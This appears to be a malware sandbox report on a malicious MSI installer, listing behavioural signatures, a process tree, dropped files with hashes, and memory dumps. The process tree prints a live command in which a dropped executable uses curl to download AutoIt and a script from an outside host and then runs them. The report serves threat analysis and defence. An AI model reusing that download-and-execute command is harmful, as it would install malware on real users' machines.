Overview

overview

10

Static

static

10

f33535fb28...a7.exe

windows7-x64

10

f33535fb28...a7.exe

windows10-2004-x64

10

f3476b5441...96.exe

windows7-x64

10

f3476b5441...96.exe

windows10-2004-x64

10

f479112f0f...e2.msi

windows7-x64

7

f479112f0f...e2.msi

windows10-2004-x64

8

f64398ee74...a4.exe

windows7-x64

10

f64398ee74...a4.exe

windows10-2004-x64

10

f672ba8bf0...6f.exe

windows7-x64

10

f672ba8bf0...6f.exe

windows10-2004-x64

10

f92501ffd4...76.exe

windows7-x64

10

f92501ffd4...76.exe

windows10-2004-x64

10

fa20559cba...8e.exe

windows7-x64

10

fa20559cba...8e.exe

windows10-2004-x64

10

fa98feb0fc...05.exe

windows7-x64

7

fa98feb0fc...05.exe

windows10-2004-x64

7

fb1c133bb4...90.exe

windows7-x64

10

fb1c133bb4...90.exe

windows10-2004-x64

10

fbce724386...fe.exe

windows7-x64

10

fbce724386...fe.exe

windows10-2004-x64

10

fc82f1f187...54.exe

windows7-x64

10

fc82f1f187...54.exe

windows10-2004-x64

10

fd03ea32f5...54.exe

windows7-x64

7

fd03ea32f5...54.exe

windows10-2004-x64

7

fe21006be0...ea.exe

windows7-x64

10

fe21006be0...ea.exe

windows10-2004-x64

10

fe53c0822d...00.elf

debian-9-armhf

1

fe6b8e0d18...a4.exe

windows7-x64

10

fe6b8e0d18...a4.exe

windows10-2004-x64

10

ff53a80edb...60.bat

windows7-x64

7

ff53a80edb...60.bat

windows10-2004-x64

7

ffbd6ffb75...4e.exe

windows7-x64

10

Analysis

  • max time kernel
    133s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-10-2023 13:04

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f479112f0f56f314af5aada9e84225ff60b6d68d2271850a442494205db0e6e2.msi

  • Size

    660KB

  • MD5

    8e68a2869daf1ba9eaebf31d2d87973e

  • SHA1

    739627919a7d4b972454158911edce0106eb5df0

  • SHA256

    f479112f0f56f314af5aada9e84225ff60b6d68d2271850a442494205db0e6e2

  • SHA512

    35997befc485f7491e5e0fd0cb50a3e5a2f7111638eeb58d36498f68c48d380d9c08d2d03f8c49cc0300830438550e2fb7fa3ac4f9f1bcede2bcad3f3b14f513

  • SSDEEP

    12288:ntvRQ+gjpjegGdo8kgLKxBTi9byLw2wHvHgU3qfrbDW:ntncpVGPkgtyLHw33qjbD

Score
8/10
discovery

Malware Config

Signatures

  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
    discovery
  • Blocklisted process makes network request 4 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 9 IoCs
  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\f479112f0f56f314af5aada9e84225ff60b6d68d2271850a442494205db0e6e2.msi
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:3560
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:792
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3028
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 2296B5A19DE839C69553362A72C078A0
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:380
      • C:\Windows\SysWOW64\ICACLS.EXE
        "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-5af1135e-499e-426e-acd3-7010fd4eae15\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
        3⤵
        • Modifies file permissions
        PID:2156
      • C:\Windows\SysWOW64\EXPAND.EXE
        "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
        3⤵
        • Drops file in Windows directory
        PID:4108
      • C:\Users\Admin\AppData\Local\Temp\MW-5af1135e-499e-426e-acd3-7010fd4eae15\files\KeyScramblerLogon.exe
        "C:\Users\Admin\AppData\Local\Temp\MW-5af1135e-499e-426e-acd3-7010fd4eae15\files\KeyScramblerLogon.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:4740
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c cd /d %temp% & curl -o Autoit3.exe http://piret-wismann.com:2351 & curl -o cztngt.au3 http://piret-wismann.com:2351/cztngt & Autoit3.exe cztngt.au3
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1916
          • C:\Windows\SysWOW64\curl.exe
            curl -o Autoit3.exe http://piret-wismann.com:2351
            5⤵
              PID:892
            • C:\Windows\SysWOW64\curl.exe
              curl -o cztngt.au3 http://piret-wismann.com:2351/cztngt
              5⤵
                PID:472
              • C:\Users\Admin\AppData\Local\Temp\Autoit3.exe
                Autoit3.exe cztngt.au3
                5⤵
                • Executes dropped EXE
                • Checks processor information in registry
                PID:3564
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 4740 -s 452
              4⤵
              • Program crash
              PID:2324
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\Admin\AppData\Local\Temp\MW-5af1135e-499e-426e-acd3-7010fd4eae15\files"
            3⤵
              PID:2532
            • C:\Windows\SysWOW64\ICACLS.EXE
              "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-5af1135e-499e-426e-acd3-7010fd4eae15\." /SETINTEGRITYLEVEL (CI)(OI)LOW
              3⤵
              • Modifies file permissions
              PID:224
        • C:\Windows\system32\vssvc.exe
          C:\Windows\system32\vssvc.exe
          1⤵
          • Checks SCSI registry key(s)
          • Suspicious use of AdjustPrivilegeToken
          PID:1028
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4740 -ip 4740
          1⤵
            PID:452

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C42BC945025A34066DAB76EF3F80A05
            Filesize

            39KB

            MD5

            b1dfc18e0251b7bbc92beb3182ee6c74

            SHA1

            0b52e4a95c2361776c3a92100d2457ab1966659e

            SHA256

            622739cfefff5115fe240409a10a8cd2b9c457f72e8c306a6389d21e542227e8

            SHA512

            7a852b6f042d43be79caff6b26abcf9ec7d9508fe5ea112bfcd6ac6c5715868a72a3c9d78117ef38e8dfc0521d3596074baf4dca6c03aab70975801cf9347c6c

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FE17BEC2A573BC9AE36869D0274FFA19_6DA81F04C5F9EAD2CD0268808FCE61E1
            Filesize

            727B

            MD5

            4e25d0434bd1f6cf35ee2c332255e571

            SHA1

            95a58811cbde3a2513d7fb8210e79545d45b8ab4

            SHA256

            8bc805fff18eda3d49a908d49f5659c07231e5bf0f4508019624b38a385a90f9

            SHA512

            09ef92c3f49ea82800bcd0b4fdcb6d7a5e559c9dad9bbdda139cbabef08907b89234026ece34f47e5626d5f56103220ac907ceda3c63b7eaab8933acbcf02e23

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C42BC945025A34066DAB76EF3F80A05
            Filesize

            314B

            MD5

            f153c5899438c7098bb30aa1cf6fbbc5

            SHA1

            7dd43c92578b95c1fafae7dc41dc8a1f1ea9d1e4

            SHA256

            88e87bd27608869aa9c1d5599eeafa2de78fcfa05723df82485eafe2cbfaeffa

            SHA512

            90ab61882e07f75336b3e43fe3e0f463f85a2c1b72a26d1d9663b1f77fd624d2fb625411f7653e9f9fade731aa983022fa34dd916cedd10809dfd5027e0d8c89

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FE17BEC2A573BC9AE36869D0274FFA19_6DA81F04C5F9EAD2CD0268808FCE61E1
            Filesize

            478B

            MD5

            73e56c89a52beb4f322190d9d6d917e7

            SHA1

            a8a6147207a14de1477c3d634851fac85c9a7ac6

            SHA256

            afd5b1caa8e1771209b7857659a6df89917777fc0a3d3638ae6ff596692c27f8

            SHA512

            aad0fe512a074f7c0c9a710f2e435b3d5b8bf744965304d0c585420e000e5fda67410a57480b1c1911bf83190ff517751bc26b4493ff274273e07ef7d606e68b

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\Autoit3.exe
            Filesize

            872KB

            MD5

            c56b5f0201a3b3de53e561fe76912bfd

            SHA1

            2a4062e10a5de813f5688221dbeb3f3ff33eb417

            SHA256

            237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

            SHA512

            195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\Autoit3.exe
            Filesize

            872KB

            MD5

            c56b5f0201a3b3de53e561fe76912bfd

            SHA1

            2a4062e10a5de813f5688221dbeb3f3ff33eb417

            SHA256

            237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

            SHA512

            195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\MW-5af1135e-499e-426e-acd3-7010fd4eae15\files.cab
            Filesize

            403KB

            MD5

            3a268087f8f162c60aa24d4fb9bd1b2b

            SHA1

            b942dd465d2044953fb3ef9eb91f1d6138101687

            SHA256

            53beb7204377b417d7439b84bdaee22a6c72eeb3fd1579dde8e0ad69506188c3

            SHA512

            eadd2b867b5b352b866361546d5265d332c669ceff70bd375a703a1ee0b9e2e64c5d4e66c437854308427f7285efd101d4f85356e03ed1c5a7c5a76a3e0a9613

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\MW-5af1135e-499e-426e-acd3-7010fd4eae15\files\KeyScramblerIE.DLL
            Filesize

            454KB

            MD5

            9e0ae735a86eb8f0dc472f267ebbb74c

            SHA1

            53ff35f13620da5a432cd5dfac933749f070b74d

            SHA256

            6978c0e3b06bc11cd7ac954c71fb9a2ee318433b2f46ec45234d7a13e55f812a

            SHA512

            b6cdc0222eca0acccdb4a3407fdbb9ab50508f82e95ef6d6e5129232d78c3ef39a8ddda05856469ca9fb7def1e65378b6d875971f95fd604a7b0681816cce222

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\MW-5af1135e-499e-426e-acd3-7010fd4eae15\files\KeyScramblerIE.dll
            Filesize

            454KB

            MD5

            9e0ae735a86eb8f0dc472f267ebbb74c

            SHA1

            53ff35f13620da5a432cd5dfac933749f070b74d

            SHA256

            6978c0e3b06bc11cd7ac954c71fb9a2ee318433b2f46ec45234d7a13e55f812a

            SHA512

            b6cdc0222eca0acccdb4a3407fdbb9ab50508f82e95ef6d6e5129232d78c3ef39a8ddda05856469ca9fb7def1e65378b6d875971f95fd604a7b0681816cce222

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\MW-5af1135e-499e-426e-acd3-7010fd4eae15\files\KeyScramblerIE.dll
            Filesize

            454KB

            MD5

            9e0ae735a86eb8f0dc472f267ebbb74c

            SHA1

            53ff35f13620da5a432cd5dfac933749f070b74d

            SHA256

            6978c0e3b06bc11cd7ac954c71fb9a2ee318433b2f46ec45234d7a13e55f812a

            SHA512

            b6cdc0222eca0acccdb4a3407fdbb9ab50508f82e95ef6d6e5129232d78c3ef39a8ddda05856469ca9fb7def1e65378b6d875971f95fd604a7b0681816cce222

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\MW-5af1135e-499e-426e-acd3-7010fd4eae15\files\KeyScramblerLogon.exe
            Filesize

            500KB

            MD5

            c790ebfcb6a34953a371e32c9174fe46

            SHA1

            3ead08d8bbdb3afd851877cb50507b77ae18a4d8

            SHA256

            fa7ad2f45128120bccc33f996f87a81faa2e9c1236666dd69b943a755f332eb1

            SHA512

            74e3ab12b2a2d5c45c5248dd2225bfbcf237a01ef94fdca3fe99cfde11bd7d0ccd25dd7f26bd283997d951f4df7e8f4b35f9475a32bdb854d6cc8867b2c45554

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\MW-5af1135e-499e-426e-acd3-7010fd4eae15\files\KeyScramblerLogon.exe
            Filesize

            500KB

            MD5

            c790ebfcb6a34953a371e32c9174fe46

            SHA1

            3ead08d8bbdb3afd851877cb50507b77ae18a4d8

            SHA256

            fa7ad2f45128120bccc33f996f87a81faa2e9c1236666dd69b943a755f332eb1

            SHA512

            74e3ab12b2a2d5c45c5248dd2225bfbcf237a01ef94fdca3fe99cfde11bd7d0ccd25dd7f26bd283997d951f4df7e8f4b35f9475a32bdb854d6cc8867b2c45554

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\MW-5af1135e-499e-426e-acd3-7010fd4eae15\msiwrapper.ini
            Filesize

            1KB

            MD5

            a1ffe1004e107b440d998de03ea34051

            SHA1

            4a479c010046b90a3f3c6fc620bb9f5a0487f69d

            SHA256

            93c6cbc52c204480404123266f683f617c89c456ce401c7f3d84cc785e129b58

            SHA512

            2f4bc99814f7f53097485135e7ae4d3c9d230cc8074c7b2fe5ec43ce65d9e028e2f2bd615181cb81f9af309b5cdc5ce85cafb58cd4bc070aec130fd0da118254

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\MW-5af1135e-499e-426e-acd3-7010fd4eae15\msiwrapper.ini
            Filesize

            1KB

            MD5

            bddd298df236f4811b8957619f7f1a81

            SHA1

            a5cbcc784fc310b6657b402a7dbd33844ff06296

            SHA256

            b4aeb2eb4a119befe91344a51782ff8e1aa3fdb7e929345e6ab48933bff8382e

            SHA512

            75d7bc0347c0330582741b1b463e8e20da3919e32c4b34e9f2514fd1c4555013269f8f87ca351f0ac8efa39a42c2e7ae370a981a3aa91b0d717d4f1606e1ff4c

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\MW-5af1135e-499e-426e-acd3-7010fd4eae15\msiwrapper.ini
            Filesize

            1KB

            MD5

            bddd298df236f4811b8957619f7f1a81

            SHA1

            a5cbcc784fc310b6657b402a7dbd33844ff06296

            SHA256

            b4aeb2eb4a119befe91344a51782ff8e1aa3fdb7e929345e6ab48933bff8382e

            SHA512

            75d7bc0347c0330582741b1b463e8e20da3919e32c4b34e9f2514fd1c4555013269f8f87ca351f0ac8efa39a42c2e7ae370a981a3aa91b0d717d4f1606e1ff4c

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\cztngt.au3
            Filesize

            85KB

            MD5

            7d00d7b1509350ef42de43b28a2efeec

            SHA1

            a2deca1c9c48e0402d34ab9b66b63a335e827bf1

            SHA256

            4aea930309b590d34488187a8c9cb31b83ff1faa2ff4d27606e50fac3a0db742

            SHA512

            7597f436966a662451bc495ce7758f493af607479cf63ebc521a4a9f178f6ae9dd22b47e5953a0fa2780a695b021e6e4c5d58301053eed0778fd07f89876f625

            Download Submit

          • C:\Windows\Installer\MSIF94A.tmp
            Filesize

            208KB

            MD5

            d82b3fb861129c5d71f0cd2874f97216

            SHA1

            f3fe341d79224126e950d2691d574d147102b18d

            SHA256

            107b32c5b789be9893f24d5bfe22633d25b7a3cae80082ef37b30e056869cc5c

            SHA512

            244b7675e70ab12aa5776f26e30577268573b725d0f145bfc6b848d2bd8f014c9c6eab0fc0e4f0a574ed9ca1d230b2094dd88a2146ef0a6db70dbd815f9a5f5b

            Download Submit

          • C:\Windows\Installer\MSIF94A.tmp
            Filesize

            208KB

            MD5

            d82b3fb861129c5d71f0cd2874f97216

            SHA1

            f3fe341d79224126e950d2691d574d147102b18d

            SHA256

            107b32c5b789be9893f24d5bfe22633d25b7a3cae80082ef37b30e056869cc5c

            SHA512

            244b7675e70ab12aa5776f26e30577268573b725d0f145bfc6b848d2bd8f014c9c6eab0fc0e4f0a574ed9ca1d230b2094dd88a2146ef0a6db70dbd815f9a5f5b

            Download Submit

          • C:\temp\njsswd
            Filesize

            380KB

            MD5

            b537196e2a994f2abca7c0b03bd137e0

            SHA1

            a99417120a1a5a600304df2eb1d8a90c62d81324

            SHA256

            bd1d18226a18b8e9eb3819f8e07ad1c205c0f3562f7eb70c4b70a69d92a3adc1

            SHA512

            85e0705bf2361e75ae2016c9417f95169007db950db8839ceb78fd504d89c9beedd92ee029f9f849602973534ca24d805e5ff1d34fdb31a50266ade6b526b989

            Download Submit

          • \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
            Filesize

            23.0MB

            MD5

            fa3ac602f2f47b5777a0dbe499aca84a

            SHA1

            5c4eaa52663c0c585c443d9578f69655c69021ae

            SHA256

            5fc19a08e881d87d2753a1dc5296e289202b2a26d043df1ffcdabb75e35356fe

            SHA512

            16d75ae82c73d23fe26080e1aa0d539064506657599617a6ffb116cf006d34ebb3956ac55a76424fe9b3dd3d82ce2c8c8b9c7abb0d8f05f258603a7860cae0ba

            Download Submit

          • \??\Volume{99926f1d-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{3251f9fe-c41c-44ff-9f39-fa45ea787a34}_OnDiskSnapshotProp
            Filesize

            5KB

            MD5

            3a011f876c8430e2f035c58573ab7e9f

            SHA1

            fbc61c4117d0ec02e18221d0dbfea8d747248955

            SHA256

            c315b0f559e0a5fec75fa91ec1f8b14e1b0094bad949344b8b8c47907790fb08

            SHA512

            ebc4b4a1e997d202aaabdf001b8b47d5700912b4c2562ec03d2a79bcb91d6ac07f45db67f04cf49d6c59a802e3e5cb94fd07347b2d5d462b1afe17bde7a3f207

            Download Submit

          • memory/3564-108-0x0000000005420000-0x0000000005609000-memory.dmp

            Filesize

            1.9MB

            Download

          • memory/3564-110-0x0000000005420000-0x0000000005609000-memory.dmp

            Filesize

            1.9MB

            Download

          • memory/3564-102-0x0000000001150000-0x0000000001550000-memory.dmp

            Filesize

            4.0MB

            Download

          • memory/4740-92-0x0000000000BE0000-0x0000000000C56000-memory.dmp

            Filesize

            472KB

            Download

          • memory/4740-94-0x0000000000C70000-0x0000000000D70000-memory.dmp

            Filesize

            1024KB

            Download

          • memory/4740-113-0x0000000000BE0000-0x0000000000C56000-memory.dmp

            Filesize

            472KB

            Download